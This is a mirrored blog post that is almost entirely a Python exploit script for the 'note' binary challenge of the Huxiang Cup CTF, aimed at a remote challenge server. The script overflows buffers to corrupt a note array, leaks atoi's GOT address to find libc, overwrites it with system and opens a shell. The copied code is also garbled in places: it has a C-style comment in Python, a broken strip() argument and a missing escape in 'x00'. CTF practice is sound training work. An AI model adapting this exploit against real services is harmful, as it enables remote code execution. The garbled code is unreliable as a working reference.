zoukankan      html  css  js  c++  java
  • 湖湘杯_note

    from threading import Thread
    
    from zio import *
    
    target = './note'
    target = ('114.215.220.77', 10001)
    
    def interact(io):
        def run_recv():
            while True:
                try:
                    output = io.read_until_timeout(timeout=1)
                except:
                    return
    
        t1 = Thread(target=run_recv)
        t1.start()
        while True:
            d = raw_input()
            if d != '':
                io.writeline(d)
    
    
    def add(io, length, buff):
        io.read_until('--->>')
        io.writeline('1')
        io.read_until(':')
        io.writeline(str(length))
        io.read_until(':')
        io.writeline(buff)
    
    def edit(io, id, buff):
        io.read_until('--->>')
        io.writeline('3')
        io.read_until('id')
        io.writeline(str(id))
        io.read_until('append')
        io.writeline('2')
        io.read_until(':')
        io.writeline(buff)
    
    def edit2(io, id, buff):
        io.read_until('--->>')
        io.writeline('3')
        io.read_until('id')
        io.writeline(str(id))
        io.read_until('append')
        io.writeline('1')
        io.read_until(':')
        io.writeline(buff)
    
    def show(io, id):
        io.read_until('--->>')
        io.writeline('2')
        io.read_until('id')
        io.writeline(str(id))
        io.read_until('is ')
        atoi_addr = l64(io.readline().strip('
    ').ljust(8, 'x00'))
        return atoi_addr
    
    def exp(target):
        io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    
        io.read_until('name')
        io.write('a'*0x30+l64(0)+l64(0x70))
        io.read_until('address')
        io.writeline(l64(0)+l64(0x70))
    
        add(io, 128, 94*'a')
        #io.gdb_hint()
    
        edit(io, 0, 'b'*33+'c'+l32(0x6020E0+0x40))
        atoi_got = 0x602088
    
        //应该是先将地址溢出,然后添加新的note,写入的是note数组的指针的地址,将这个地址的内容写成atoi的地址,然后显示的是atoi的地址——泄露
        add(io, 0x60, l64(atoi_got))
        atoi_addr = show(io, 0)
        base = atoi_addr - 0x36e80
        print hex(base)
        system = base + 0x45390
        print hex(system)
        edit2(io, 0, l64(system))
        io.read_until('--->>')
        io.writeline('sh')
        interact(io)
    
    
    exp(target)
    
    
    
  • 相关阅读:
    比较.NET程序集(DLL或EXE)是否相同
    [转] JavaScript数组去重(12种方法)
    [转] js网络请求跨域问题汇总(携带cookie)
    [转] JS中arr.forEach()如何跳出循环
    [转] vue前端异常监控sentry实践
    [转] vue父组件触发子组件事件
    [转] vue 自定义组件使用v-model
    [转] Nginx配置性能优化
    [转] linux 查找文本过滤grep正则表达式命令详解用法
    [转] Nginx配置中的location、root、alias
  • 原文地址:https://www.cnblogs.com/volva/p/11814390.html
Copyright © 2011-2022 走看看